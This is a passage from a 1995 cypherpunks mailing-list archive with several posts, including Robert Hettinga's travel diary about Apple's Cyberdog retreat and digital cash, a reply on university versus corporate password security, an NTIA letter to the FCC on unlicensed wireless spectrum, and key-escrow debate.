intrigued enough to call the manufacturer, and confirmed that it did indeed hop frequencies while the call was underway. How often, and how the next frequency was determined was not known by the guy I talked to, and I balked at the $350 price. speaking for myself Peter Trei trei at process.com Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com From rah at shipwright.com Fri Dec 15 21:52:17 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 16 Dec 1995 13:52:17 +0800 Subject: e$: Seven Days Message-ID: -----BEGIN PGP SIGNED MESSAGE----- 12/15/95 Boston, MA Interesting things happened during seven days last week, which I spent mostly on the road. The focus of the trip was almost entirely on e$ and geodesic markets, so I thought I'd do a reprise of the "24 hours" post here for fun. Tuesday Woke up at about 6 and thrashed the e-mail pile for about an hour. I'm finding that I get up, do e-mail and then take a shower. Could trollhood be far behind? Usually, I have at least 100 messages in the mailbox first thing in the morning. Almost all of this is not for me, about 95% is e$pam fodder, of which 10% makes the cut. About 80% of the total is still cypherpunks -- so, what else is new? The NetGAK fight dominates all, and I get flamed by one of my subscribers about pumping so much of it onto e$pam. I ask him to send the flame to the list, but nothing ever happens. I figure that the more cogent NetGAK arguments deserve e$pamming because of my oft-debated contention that digital commerce is finanicial cryptography, and financial cryptography is a subset of strong cryptography, and attempts by nation-states to regulate commerce, and thus strong cryptography, are usually entertaining when they're not dangerous. These days, I suppose Duncan Frisell would call GAK-attempts entertaining, and Tim May would call it dangerous, and I fall in between somewhere. Sometimes, all of this reminds me of Barr Rosenburg, the popular 70's analyst-of- stock- analysts who made a whole lot of mutual fund managers feel much better about themselves and the efficient market hypothesis. His point was that if they didn't try to beat the market every day of their lives, there wouldn't be a market to beat. The best fund managers did beat the market on a regular basis, just barely, and that was the incentive for all the rest to try their hand at it. We all benefit as a result. We can buy a mutual fund, or just buy an index fund, and for the most part, we can be sure that the market will go up a reasonable annual amount on some long term average. I see progress against government interference in the net.market the same way. Just one of us can't really do it, but if all of us chip away at it, some of us more than others, then those "profits at the margin" begin to add up to a trend of government cluefulness about economic reality as far as geodesic markets on the net are concerned. One of the biggest clues of all is that strong cryptography is the lynchpin technology for any real peer-to-peer cash-settlement economy. They just don't get that yet. They will. The market is efficient. I get cleaned up, pack (always at the last minute, and always in a hurry) call a cab and go down to the Harvard Club on Federal Street to moderate the Digital Commerce Society of Boston luncheon. We had about 30 people and 3 no-shows, which is about par after three months of doing this. We also had about 10 new people, which is also par. Among them was a sizable contingent from the financial community, which is good, because I put the meeting in the middle of Boston's financial district on purpose. We had people from State Street Bank's bond room, some people from Fidelity Systems' advanced technology bunch, one guy from Mellon Bank's advanced technology group, and someone from Lehman, who I believe was another bond trader. Rich Salz, from OSF, was the speaker, and he talked about financial middleware for the internet. When I listen to someone like Rich, I'm always reminded of just how much I *don't* know. Among other things, Rich told the story about how someone had to fight tooth and nail to keep people from putting URLs into Super Bowl ads, because the net.infrastructure wouldn't pass the smoke test. Something about too much demand if they advertised Madonna's langerie for sale... DCSB is growing nicely, I think. We've got speakers booked out until next June, running the gamut from FSTC to Perry Metzger, we're keeping our Harvard Club bill paid, and everyone looks happy to meet someone else whose eyes don't glaze over when they talk about digital commerce technology and its consequences. The plane flight is boring, and I keep forgetting to get some kind of battery brick for shipwright.com, my PowerBook 180. To top it off, I've had it more or less plugged into the wall for a year, so the battery's gone. So, I read Forbes, and then the Atlantic, and then after a plane change in Chicago, I sleep until I get to San Jose, where Vinnie, a friend of mine from Apple, and my equivalent of Hunter Thompson's Samoan attorney, picks me up. I go crash on a futon in his living room, and wake up way too early. Wednesday. After waking up at 4:30, downloading e-mail and thrashing it all into food for Thumper, our ailing mail-server, I forestall trollhood one more time and get cleaned up to go outside. This time, it's to go hang out for three days at the Apple OpenDoc Cyberdog Coding Retreat, or "Kitchen", as they say at Apple. First, Vinnie takes me to his office at Apple Developer Technical Support (DTS), by way of a triple esspresso dumped into a large coffee (Vinnie's version of a weightlifter's ephidrine stack, I suppose) and a rather large cholestorol-festival breakfast at the Apple cafeteria. At Vinnie's office, I meet several of his workmates, including his shooting buddy Jeff, who, along with Vinnie, takes failed hard drives out to the shooting range periodically for durability testing. Jeff says there's something satisfying about the sound of AK-47 fire ricocheting off of the pride of Conner, Seagate or Quantum in the early evening after a hard day's bug-hunting. Vinnie, who got started messing around with computers when he was about 13, at MIT's AI lab in the early 70's, is also an ex-marine black-belt who teaches handgun safety and marksmanship. He has one of those humaniform target sheets pasted on his office window with tidy groupings over the middle chest and forehead, the result of a field trip that folks in DTS took one day to the range. After much arm-twisting, they persuaded Vinnie to take a few shots himself, and he squeezed off the above Glock magazine in about 8 seconds or so. That, the break-out picture of the AK-47 on his wall, the business card that says "DTS Sniper. One shot, One kill", and the Glock t-shirt with the rolled up sleeves over a few too many muscles under hair that's buzz-cut a little bit short, makes most liberals and other statists a little nevous. The small oval Oakley reflective sunglasses, don't hurt, I suppose. I have to say that someone actually pointed out all this out to me, a little later in the week. I'd never noticed it, really. I've known Vinnie for about 5 years now, and I think about Vinnie the same way that someone talked about Dick Butkus once. "Kind of a teddy bear with muscles." A very *smart* teddy bear with muscles. After taking the tour of DTS and meeting mostly normal people with the exception of Vinnie and Jeff, well, mostly normal people, anyway, we jumped into Vinnie's Toyota 4X4 with the firearm, punk band and right-wing bumper stickers all over the rear window and went over to Apple's City Center campus and the Cyberdog Kitchen. We were greeted by Jim Black, who was running the Kitchen for Apple, which consists primarily of 60 (for this kitchen, anyway, because of CyberDog; normally it's about 20) people with Macs in front of them trying to develop code in new environments for the first time. They do this over the course of 3 days, from 8 in the morning to midnight or later, punctuated by the occasional meal or presentation. Jim was the guy who flew me out here, so I figure I have to pay attention to him. Vinnie and John say relax, so I start paying attention to the kitchen itself, including fooling around with the various Cyberdog "parts", or objects. Cyberdog itself is a really cool idea. Effectively, it's an implementation of IBM's SOM object model for the internet. With Cyberdog, you can encapsulate any function in a part, kind of like a very small application on steroids. You can make parts like web-browsers, or mailers, or ftp-parts. In other words, parts for all the stuff you do on the net. My, uh, part-icular interest in this was the concept of OpenDoc and especially Cyberdog as "Geodesic" software, which was the topic of another rant, which turned into an article, which got me here at the Cyberdog kitchen. More to the point, my interest in parts comes from the ease with which one could do financial cryptography, and how developers of cyberdog parts could sell them on the net, preferably on a direct-to-the-customer basis, and for cash -- anonymous, of course;-). I had managed to get a "seat", a Mac, in other words, so that someone who actually was crypto-code-clueful could come in, and at least get up to speed on Cyberdog, and go play with it elsewhere. "Elsewhere", because of the ITARs of course. It seems that there were foriegn nationals in the room, Apple legal was more than a little bit concerned that something would be misconstrued somewhere in the bowels of Blair House. Also, there's the interesting problem of crypto-hooks as tanamount to crypto itself. I talked to more than one developer who thought he had skirted the ITAR issue all together, just by leaving crypto APIs there for other people to use. We had fun telling them all about just how hard their tax dollars were working *against* them in this regard. Anyway, all this "elsewhere" stuff was just fine, because the person I *could* get on such short notice, who was both crypto and OpenDoc capable, was Dave Del Torto, who could only show up for one day. However, in Dave I got cluefulness personified. Dave has done work for Qualcomm on Eudora, Digicash on ecash, and was under NDA to Apple for OpenDoc and Cyberdog already, and in addition, going to try to walk in with what there was of the PGP 3.0 code. Also, there were at least two well-respected Mac.Cypherpunks there working on code for their respective employers, not to mention several crypto/e$ people from Apple, all of whom were personally interested, and who will remain nameless. I was pumped. Playing around with the demo internet parts that Apple provided for Cyberdog was fun. Rather than a monolithic application like Netscape loading up when you start up a cyberdog part, you start up the part itself, and nothing else. When your browser needs mail it calls your mail part. When your newsreader needs to browse it calls your browser part. Of course, they can all call crypto or e$ parts as they need to. There's a history part that records where you were and what you did in URLs, and there's a notebook part you can stick URLs into if you want to keep them. The coolest ah, part, about all of this is that every one of these parts can be interchanged. It's also easy to see that if something gets popular like web-browsing, and people keep adding features to browsers, someone can come along and sell parts that do those features better than the browser itself can do, like bookmark management, for instance, and sell them separately. Feature creap dies in its tracks. This process is exactly the kind of "surfactant" effect that I had observed with the internet, which dissolves information into more and more dispersed pieces, and which had gotten me into all this trouble in the first place with the rant and the InfoWorld article. Couple this with the potential for geodesic markets on the net with e$, particularly with digital cash an micropayment schemes, and I thought I had something to say to these folks, which is why I was brought here to speak here in the first place. In an auditorium. With cameras and lights and videotape. And an audience with 200 people in it. As I had never actually done this before, I was feeling a little like Dustin Hoffman in "Rain Man": "V-E-R-N, Vern..." So, along about noon, we jump back into Vinnie's assault vehicle (by granola-land standards, anyway) and we go to said auditorium, called "Town Hall". There, I spoke about, according to my notes, the books "Out of Control", and "Applied Cryptography", The rise of the pyramid paradigm, Bucky (Fuller) and Pete (Huber), The net as a geodesic and information surfactant, OpenDoc as geodesic software and code surfactant, cypherpunks, strong cryptography, anonymity,the four hoursemen, digital cash and digital bearer certificates, chaotic capital, Financial Cryptography for Dogs (Teaching Cyberdog to send you money in the mail), and of couse, Dissolving the entire status quo into a cloud of self organized chaos. All of which took 45 minutes of the hour and a half I was allotted. Fortunately, about 15 minutes into the Q&A period, I was rescued by Eric Hughes, who showed up with black cowboy hat (which is how you identify those "black hat" cryptographers, I'm told), to answer all the hard stuff. I was greatly pleased, not only to get bailed out, but also to meet Eric, who I'd only talked to on the net until a week before, when we had had an actual phone call to get his appearance here arranged. Probably the most interesting thing for me was watching Eric handle the guilty titters the audience got when he talked about the profit one gets from money laundering. "It's immensely liberating when thinking about this stuff to think like an illegal operative", he said. Meaning to me, of course, that you're not trying to break the law, but that you're trying to think about how markets work in their, er, extra-legal, unregulated form. Since a very large part of financial cryptography is about how to prevent being cheated in an on-line transaction without recourse to the law and eventually physical force, Eric's spot-on about this. Another thing he said that got me to thinking was that the "foregone alternative", or opportunity cost of removing advertizing is equivalent to the amount someone spends on sending you advertising. If, for instance, an advertiser spends $1 to spam your mailbox, it's probably going to have to be worth at least 1$ for you to block him. After my talk, Eric, Sameer (also in a black hat) and I were asked into a what turned to be a brainstorming session with several people from Apple and other places, who pumped us (mostly Eric, of course) about how best to implement digital signatures as quickly and securely as possible in the Mac OS, given that Apple's RSA-signatures-in-Powertalk idea isn't getting very far. Maybe something will come of it, maybe not. Hope so. After that, I went back to the Cyberdog Kitchen with Vinnie, where we met Dave Del Torto. Dave and Vinnie thrashed Cyberdog, and I schmoozed people and thrashed e$pam until dinner. After dinner, I went home to Vinnie's and crashed at the ungodly hour of 8:30. Thursday I wake up at 6:30 this time, and, checking the bank, find out that a wire from one of my sponsors for the e$ lists has arrived. Happy, Happy, Joy, Joy. That makes two, and I'm looking for 2 more for the time being, so send me e-mail, if you're interested, or check the web page at http://thumper.vmeng.com/pub/rah/ for more details. Speaking of poor thumper, we upgraded the web software to WebStar, but the problem now is the list server, running on some freeware called MacJordomo, which works for normal applications, but was giving us fits, and crashing the server with annoying regularity. Vinnie got it rebooted, and we made an appointment to go see thumper for some surgery on Sunday afternoon up in Walnut Creek. Vinnie and I pile into his truck, almost accidentally monster-truck ourselves over someone with a no-fur vanity plate whose Tercel stops too suddenly, and went to his office so he could get caught up a little bit, after the obligatory triple espresso caffiene stack and vegetarian's worst nightmare for breakfast. Vinnie says something about this being an anabolic diet that weightlifters use. Actually, I started this about a month ago, and it works so far. I've lost about 25 lbs, and have only 165 to go... Vinnie, in his role as "Bob-handler", has negotiated a slot on the speaking schedule at the Cyberdog kitchen so I can rant at the people I came here to pay attention to in the first place, the people coding dog-parts... Yes, there's a joke, and I'll tell it later. So, I give a more Cyberdog-specific version of yesterday's talk for those who missed it. I got assisted from the aforementioned Cyberdog cypherpunks (Cypherdogs?... Nah...) on the uh, hard parts... The most important thing I tried to get across was the idea of parts paying their authors by mail. A part asks for money to be sent to the author, who sends the part a signed operating certificate, which enables the part to run. After lunch, Vinnie and I get on the road for San Francisco, stopping first for a pair of Lee Oskar harmonicas, in the key of A. I decide it's time to teach Vinnie how to play cross-harp. So I teach him how to bend a few notes while telling him about how I used to walk home from Fidelity in Boston wearing my blue suit, red tie, white shirt, and wingtips, walking into the sun, so I needed sunglasses, smoking a 45 minute Macanudo baseball bat, because I had enough time to smoke it, and playing blues harp, because I could, and the walk was boring... We're going to see a friend, who will also remain nameless for the time being, and who has just set up shop on Market street. After swearing me to secrecy, and swearing Vinnie to enforce my secrecy (good move that, swear Vinnie to anything, and it happens), they tell all about what they're up to, and it's big. Very big. The more I think about it, the bigger it gets, until fiinally I force myself to look out of the eighth floor conference-room window, and down Market Street. Sure enough, lumbering up from the waterfront is the Sta-Puff Marshmallow Man, straight out of Ghost Busters. I shake my head, and it goes away... So our friend and some of his friends go to a hotel lobby, where Vinnie gets to smoke a Cohiba for the first time, and then on to "Stars" for dinner, and then home to sleep in Vinnie's living room. Bizzarre dreams about the Marshmallow Man, drinking triple-espresso-in-black-coffee... Friday The last day of the CyberDog Kitchen. People are rushing around to finish their demo Cyberdog parts before show and tell this afternoon. I thrash e$pam some more, and meet with Stephen Humphrey, a contractor to Apple from Salt Lake City, who's writing a book on OpenDoc, and who seemed to be Apple's front-line code resource person at the kitchen. We talked about possible payment APIs for Cyberdog, and his forthcoming book, which I'm writing the preface for, for which he's going to pay me a few bucks in Mark Twain Bank's ecash, just so we can say we did it. I also talked Steven Roussey, of PartMerchant. He's developing a server which will sell OpenDoc parts on the net directly to Cyberdog users as they need them, and he's going to settle his transactions in ecash, among other things. It turns out, he *is* writing a payment API for Cyberdog, so that a part can hold the user up for money at periodic intervals and send it to the developer, through PartMerchant initially, but certainly in the long run, developers with permanent net presences can use this same API to collect their revenues directly. To me, that means a rather interesting scenario where copyrights and patents matter much less because developers get paid for the code which is being *used*, eventually maybe at runtime, and certainly at periodic intervals, or at a flat rate, or whatever the market will bear. I thanked him for all his efforts. Effusively. After lunch, it was time to do a "show-and-tell" of the Cyberdog parts that people had built in the past three days. People had done all sorts of stuff, including various tweaks on the reference Cyberdog parts to see if it could be done. The most important thing for me was seeing Java run in an OpenDoc part. This meant several things to me. The first is that I keep getting people telling me that Java and OpenDoc are competitors. Quite obviously, that is not the case. Java can run in any container, including OpenDoc containers. It also means that if competition for Java comes along, OpenDoc can run that, too. This also means that the need for monolithic applications to run Java, like Netscape, or any wild fantasy of Microsoft, is nonexistant. This becomes important because Macromind has a Java-equivalent, and it proves that others will follow. Just download a part on the fly from the PartMerchant, and you can run those scripting languages too. To me, the whole idea of economies of scale gets turned on its head in this kind of "geodesic" environment. If someone likes Java, they can write something better, and someone else will write a Cyberdog part to handle it. If someone likes that part, they can write a better one, and so on. This Darwinian, er, dog-eat-dog world can only lower software prices, and make better software. The people who benefit are the small developers, because they move, and can get paid, faster. I look at Apple like the US in the early 19th century, letting people homestead on the land by giving it to the people who develop it. Lincoln had to do nothing but give away rights of way to the railroads to make a transcontinental line a reality. Apple licences OpenDoc to developers as cheaply as possible, maybe giving it away as much as possible, and all these developers make Macs the platform of choice on the net, selling more Macs and Mac-clones in the process, just like the homesteaders made the land they moved onto more valuable, and eventually taxable. Only this time, there is no pristine wilderness or native americans to abuse. Cool. Finally the dog-part joke. Someone, riffing on the BBEdit "It doesn't suck" slogan said, "Cyberdog doesn't suck..." and someone in the crowd finished the sentence with "...it licks!", and someone else said, "Because it can!". And then there was a massive "EEEEWWWWWWW" from everyone else... Now *that* was disgusting... Oh, well, they'd been working from 8 AM to midnight plus for 2 days... After the show and tell was over, the kitchen was over, but Vinnie and I hung around for a while as people were packing up all the Macs Apple provided for the kitchen. While chatting with some of the OpenDoc evangelists, we talked about how OpenDoc, just like the net, was just like this vast unexplored territory. I said that Lincoln built the transcontinental rail road with -- and the woman who was the division head for all the OpenDoc evangelists finished my sentence and said "land grants!" with the strangest smile on her face. I think I connected there... After that, Vinnie and I packed up and went over to his office, hung out there while Vinnie did some of his own work, and then went out for dinner with a bunch of DTS people. Saturday I wake up at a normal time. Vinnie and I go out to Gold's gym and thrash weights with his buddy Ray from DTS, who's been working for Apple for 14 years and is, pound for pound, about the strongest guy I've ever seen. After breakfast, the purchase of two boxes of Macanudo "Prince Phillip" cigars, a visit to Rochester Big & Tall, and renting a tux for Vinnie for the Apple Christmas party, we pick up Cynthia, who's Vinnie's friend, and who, in addition to building the Apple OpenDoc website, helped Vinnie clang trashcan lids together to get people into the audience for my talk on Wednesday, not to mention asking pertainent NetGAK questions of Eric during the talk itself. Vinnie, Cynthia and I pile into her car and head out to a cypherpunks party somewhere in the hills near Los Gatos. After missing the turnoff twice in both directions, we finally arrive at a geodesic dome. Not missing the irony of this, having just given a talk at Apple on "Geodesic Software and Financial Cryptography for Dogs" I have to laugh a bit. This is an honest-to-goodness, straight out of the Whole-Earth Domebook, back to the land, llamas-and-all geodesic dome, complete with naked hippies in the hot tub. I come to the conclusion that this is going to be a great party, even if I only know people from what they've written on cypherpunks. I saw Sameer and Sandy Sandfort, who I had met earlier in the week, and Eric, of course, who was holding court with Roger Schlafly about patent esoterica when I came in. I saw Raph Levien, and the guy (sorry, can't remember all names) who was working on PGP3, who had a single paper copy of the PGP3 API to pass around, and Eric peppered him uncomfortably with interface call questions, ending most of Mr. PGP3's answers with "Oh, well, we'll wait until it's released, and then we'll deal with it", that is until someone let it be known that the hot tub was in fact open for business. At that, Eric fairly scampered out of there for the back porch, where the tub was. A little later on, after I was introduced to "the guy who wrote the game Gorp", who did something much more important later but I can't remember what, I had fun just sitting there in a denim bean-bag chair, looking up at the dome's ceiling, listening to people rant crypto for a while, with Cynthia noticed that, besides broad-brimmed black hats, cryptographers all have these Tolkein-wizard pointy goatees. Made me glad my attempts at facial fur had been constantly interrupted by the need to "clean up for company", me not being a real cryptographer and all... One of the people I met was Mr. Weinstein from Netscape. We chatted for a while, and I told him that he had probably won this year's Black Rhino Ammunition Inc. "Mr. Kevlar" award for his service in the cause of cypherpunkdom. He laughed. I didn't tell him that Black Rhino Ammunition was a fictional company dreamed up by the gun lobby to get a rise out of the Clinton administration, and that the Clinton administration had risen so much that they had banned the fictional company's fictional Kevlar-penetrating bullets... That, of course, was off-topic. ;-). Vinnie broke out one of the boxes of baseball-bat-sized Macanudos, and we proceeded to hang out on the back porch ourselves, killing insects and gagging llamas with tobacco fumes. I offered some to the naked hippies in the hot-tub, but they had better things to do than to stand wet and naked on a cold back porch smoking cigars. Eventually Vinnie and I were joined by three or four others, and their various frowning spousal and virtual-spousal units. A good time was had by all, albeit a little on the cold side, until Vinnie looks at my watch (Vinnie doesn't wear a watch) and says "Oops. Time for the next party", and I went in to get my Mac from behind the chair Eric was sitting in before he cornered Mr. PGP3 and then galloped off to the hot tub. This chair now had another guy sitting in it, and, as I had been doing all evening, I introduced myself, by way of retrieving my Powerbook. It was Tim May. I laughed, and shook his hand goodbye, which must have puzzled him a bit, got my Mac from behind him, and split. Tim May looks much different in person than he does on the net. On the net, he's this short, skinny-but-muscular, pushy guy with no beard who looks too young for his age. In person, he's exactly the opposite on all counts. Gooo figure. We headed into San Jose and the house of one of three people at Apple with the title of "Scientist". The guy who answered the door looked like a biker. Actually, he was a biker, colors and all. He was also the "Scientist", who had just achieved that apellation by working up through the ranks from Vinnie's department, Developer Technical Support. A very smart guy with an amazing collection of CDs (including the entire DiMeola canon), early 60's Dodges and Ramblers, guitars (including a 1959 Stratocaster), and, of course, Harleys. He also had a very hairy persian cat, named Freddy, and whose full name wouldn't surprise me if it was "Fat Freddy" of Fabulous Furry Freak Brothers fame... So, after the birthday party's birthday person opened all her gifts, Vinnie and Cynthia and I took off, leaving the remaining Macanudos behind for our esteemed host. We expect his outside smoke breaks on the Apple campus to take on the order of 45 minutes, while the cigars last, anyway... Sunday Today's mission was to go to Walnut Creek, where both my in-laws and the beleagered e$ server thumper lives. After we had breakfast with Jeff, of hard-drive durability test fame, who gave me all his old PowerBook 100-series batteries and chargers, Vinnie and I went up to Walnut Creek. We had lunch with my brother-in-law and nephew, who gave me warm regards from most of my other in-laws, who all came down with the flu that week, ;-), exchanged Christmas gifts right there in the Buttercup Diner, and then went on to the AG Group, where thumper lives. The AG group makes network monitoring software like Etherpeek and Skyline, and one of Vinnie's friends, a founder there, had let us hang thumper off of their internet feed. After thanking him for letting us in, and for putting thumper up for the duration, and hearing *him* thank his lucky stars he wasn't parasailing on Mt. Diablo this afternoon -- where the winds had just piped up to 70 mph -- we went into AG Group's machine room and began to perform brain surgery on thumper. Thumper, who started life as a Quadra 950 running httpd and Macjordomo, is now a PowerMac 8100 running WebStar and, soon, ListStar. We munge around on it remotely with Timbuktu, and, since we were having so much trouble between AIMS and MacJordomo, we're going to drop in AutoBoot so we won't have to have someone manually restart it for us. We brought up ListStar, and, deciding that it was way too much work to do that afternoon, brought it back down to prototype the e$ lists remotely and then upload them later. So now, we're waiting for a break in schedule so that we can do just that, sometime this week. I hope. So, we went back to Vinnie's house, by way of Fry's to pick up a battery brick, and Warehouse, to get the videos "The Decline of Western Civilization", and "Dazed and Confused". It seems that Vinnie wanted to relive his lost youth on both counts. Cynthia came over, and she, Jim (who's Vinnie's roomate), Vinnie and I ate pizza and watch Vinnie fast-forward through most of "Decline", except for watching the "Fear" segment twice, and then we actually watched all of "Dazed", which put a lump in my throat, seeing as I was Lafayette HS, '77, and in Vinnie's too, as he was Boston Latin '78. It seems this movie has cult status. Has nostalgia arrived for 70's dopers and acid casualties? It seems to have happened... After that, I thrashed e$pam and went to bed. Monday Vinnie had to help with the Open Transport kitchen. I hung with Cynthia for a while, and then we went down to the cafeteria, and met Guy Kawasaki getting his breakfast. Cynthia introduced me to him, and he gave me a "why should I know you?" look, but I did get to shake the man's hand, which means now I never have to wash it. Ewwwwwww. Finally, we went back to the Open Transport kitchen where Vinnie was working, said bye to Vinnie, and Cynthia took me to the airport, put me on the plane, and, as soon as we leveled off, I started writing this on shipwright.com. The battery brick works great. When I got home, I asked my wife how church was that morning. She said, "Bob, it's Monday." Oh. Right. It's Monday... Cheers, Bob Hettinga -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNIti/gyLN8bw6ZVAQHzxwP/V1qCuwb5XAkyKxr3Tdkafwd/WcBhAKAb NVXryVnChBa1DmmL6UA24ZVIeO3ELZkkYc5N+4e5qsG5zE0gIt00ZP0NXEpr8Xxl AioYwTIvKt5sJKLzBb/uNxnivKuIU9zLwqJiJ4NwIzZDvfzUi9EdhPWV9Y42bQ5J +rnQpWEMtpA= =PXfA -----END PGP SIGNATURE----- ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971 "Reality is not optional." --Thomas Sowell The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/ >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From fc at all.net Fri Dec 15 21:55:30 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Sat, 16 Dec 1995 13:55:30 +0800 Subject: .PWL spin In-Reply-To: Message-ID: <9512160258.AA17014@all.net> > > > What would make a University less secure than a corporation?? > > > > Ostensibly, universities in the interest of academic freedom and > > promoting learning usually don't have nearly the same draconian measures > > that corporations have. > > More to the point, us poor professional staff don't stand a chance > politically against students and faculty. We support whatever they want > to use. > > I think it's more an issue of control. Ford IS can say Thou Shalt Not > turn on SAP advertisement, and people will listen (or go away). At major > Universities, what we do with troublemakers is, we hire them. I think your impression of the corporate work environment is a bit naive, just as most people in the commercial environment have misimpressions about university environments. In universities, the faculty rules - sort of. The administration also has a great deal of power as is usually wielded by the deans. In corporations there are often several levels of management, each with control and responsibility. Just as a university president has little chance of success in ordering something that is viewed by the faculty as a breach of privacy or heavy handed action, the CEO of most companies is similarly constrained. In fact, it would be rare that either would get involved is this level of decision. If Ford IS said "Thou Shalt Not turn on SAP advertisement" and someone in Ford's engineering department had a requirement for SAP advertisement in order to service a major customer, the IS department would fail (and the person responsible for making the decision might be surprised at how fast the human resources department can act). > But back to the point, the anonymous (cypherpunk relevance) "system > administrator" (guess they couldn't find anyone willing to make a fool > of himself on the record?) who said that Universities would be hurt more > was wrong. We just don't have passwords on Win95 machines, or don't care > if they're compromised. It's the people at Ford, Dow, and Sprint, > which had wasted man-years putting together "policies" and "user > profiles" that have proven to be worse than useless, who are pissed off. In my experience, it is rarely the case that eaither a university or a business is well protected. Comparing one to the other is probably not very useful. One thing is for certain, however. The vast majority of the professors in computer science don't understand anything of substance about information protection. If you tried to tell them about it, chances are they would rebuff you for your attempt. Furthermore, professors of computer science almost never perform systems administration duties for the university computer center. The computer center is almost always run by professional staff not affiliated with the computer science department. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From wlkngowl at unix.asb.com Fri Dec 15 22:07:05 1995 From: wlkngowl at unix.asb.com (Mutatis Mutantdis) Date: Sat, 16 Dec 1995 14:07:05 +0800 Subject: The Elevator Problem Message-ID: <199512160410.XAA06462@UNiX.asb.com> On Tue, 12 Dec 1995 09:11:45 -0600, David E. Smith wrote: [..] >The way I understand the system, in order for Alice to have Bob's key (and >vice versa) they each have to transmit a considerable amount of data about >their keys. Even if those data are in the form of "twenty questions," neither >knows anything about the other's key at the start. Is there something >painfully obvious that I'm missing? Oddly enough, I saw this posted the same night I saw the timing-attack against RSA announced. Is there a connection here? If we assume a hypothetical future where the current families of public key encryption can be easily broken, anyhow... --Mutant Rob From tkalil at ARPA.MIL Fri Dec 15 22:10:14 1995 From: tkalil at ARPA.MIL (Tom Kalil) Date: Sat, 16 Dec 1995 14:10:14 +0800 Subject: Status of Apple proposal for wireless NII Band Message-ID: The Administration sent a letter to the FCC asking that they move forward on the Apple and WinForum petitions. The Administration's reasons for supporting the allocation are given below. The full filing is on the NTIA server at http://www.ntia.doc.gov >> >> >> November 2, 1995 >> >> The Honorable Reed Hundt >> Chairman >> Federal Communications Commission >> 1919 M Street, N.W. >> Washington, D.C. 20554 >> >> Re: RM 8648, RM 8653 >> >> Dear Chairman Hundt: >> >> This letter addresses the petitions for rulemaking filed >> before the Commission in May 1995 by the Wireless Information >> Networks Forum (WINForum) and Apple Computer Company, Inc.[1] >> Those petitions request the allocation of certain spectrum in the >> 5 GHz band and the adoption of service rules for shared >> nonlicensed personal radio network devices. Both the WINForum >> Shared Unlicensed Personal Radio Network (SUPERnet) devices and >> the Apple National Information Infrastructure (NII) Band devices >> would allow operation of nonlicensed, high-speed, wireless >> networks with multimedia capabilities. NTIA believes that these >> new wireless technologies have the potential to enhance education >> and other community services. Implementation of these networks >> and the feasibility of spectrum sharing between the proposed >> devices and Federal users should thus be fully explored by the >> Commission. We therefore recommend that the Commission proceed >> with a Notice of Proposed Rulemaking (NPRM) so that the policy >> and technical issues raised by the petitions may be addressed. >> >> NTIA serves as the principal adviser to the President on >> telecommunications and information issues, including the >> Administration's NII and Global Information Infrastructure >> initiatives. In addition, as Federal spectrum manager, NTIA >> shares with the Commission jurisdiction over the frequency bands >> under discussion in the petitions. NTIA believes that the >> proposed WINForum and Apple devices could provide an important >> means of nonlicensed wireless access to the NII. Wireless >> networks can be more affordable than wired networks. Schools, >> hospitals, businesses, and others would thus have convenient >> access to communications networks with voice, video, data, and >> graphics capabilities without the expense and disruption that >> installing wired systems would require. >> >> As you know, the President and Vice President have launched >> an important initiative to connect all of our classrooms, >> libraries, hospitals, and clinics to the NII by the year 2000. >> This initiative, which promotes expanded access to computers, >> teacher training, and the development of compelling educational >> applications, has the potential to revolutionize our educational >> system, changing the way teachers teach and students learn. >> Students will be able to collaborate with their peers around the >> world, search digital libraries, use remote scientific >> instruments, and take "field trips" to on-line museums. As >> President Clinton said in a recent speech, "[e]very child in >> America deserves the chance to get the high-tech know-how to >> unlock the promises of the 21st Century." >> >> For this reason, the Administration strongly supports >> spectrum policies that will promote affordable, high-bandwidth >> wireless computer networks. Wireless networks, and nonlicensed >> networks in particular, can be a cost-effective approach for the >> countless schools in our Nation that need connections to the NII >> to enhance learning opportunities and provide young Americans >> with the skills they will need in the future. Wireless networks >> may be an important option for schools because they often face >> limited budgets and are prevented from entering the Information >> Age by inadequate wiring. Furthermore, the proposed devices >> could allow more students to have network access directly at >> their desks in their classrooms instead of in computer labs in >> other rooms. >> >> Other users will benefit from nonlicensed wireless networks >> as well. Small businesses that lack adequate wiring and that >> cannot afford access to wired networks could have affordable, >> convenient wireless access to multimedia networks. Such access >> could enhance productivity and efficiency. Health care providers >> would have the ability to transmit patient data, such as x-rays >> and MRI images, video recordings, medical charts, and other >> records, which would dramatically improve the efficiency of >> medical staff and ease the group diagnosis of medical cases. >> Moreover, NTIA believes nonlicensed wireless components of the >> NII will provide significant opportunities for innovators and >> small companies to make contributions to the overall mix of >> products and services available through the NII.[2] >> > ********************************************************************* Thomas Kalil Director to the National Economic Council The White House Washington, DC 20500 (p) (202) 456-2802 (f) (202) 456-2223 "What do we want? Bandwidth! When do we want it? Now!" ********************************************************************* From jya at pipeline.com Fri Dec 15 22:18:31 1995 From: jya at pipeline.com (John Young) Date: Sat, 16 Dec 1995 14:18:31 +0800 Subject: RES_ist Message-ID: <199512160216.VAA29258@pipe1.nyc.pipeline.com> 12-15-95. NYPaper, crypto-bizarrely: "Extremist Army Group at War With U.S. Policy." It is not known how large the underground group is but the Special Forces acknowledge the group's existence and says that it was not in violation of any regulations. Its newsletter, The Resister, available on the Internet, said it favored "strict constitutionalism, isolationism, laissez-faire capitalism, individual rights, limited government and republicanism," and opposed "statism, liberalism, tribalism, socialism, collectivism, internationalism, democracy, altruism, pull politics and the New World Order." RES_ist (10 kb) From jimbell at pacifier.com Fri Dec 15 23:49:51 1995 From: jimbell at pacifier.com (jim bell) Date: Sat, 16 Dec 1995 15:49:51 +0800 Subject: NIST GAK meeting writeup, LONG part 3 of 3 Message-ID: At 04:22 PM 12/13/95 -0600, you wrote: >> The term "voluntary" implies (!) that people don't have to do >> something, right? If that's really the case, then the escrow agent >> should have no obligation to do what is called "voluntary." > >Voluntary GAK means the system is voluntary for the USERS, not for the ESCROW >AGENTS. What is the point of certifying escrow 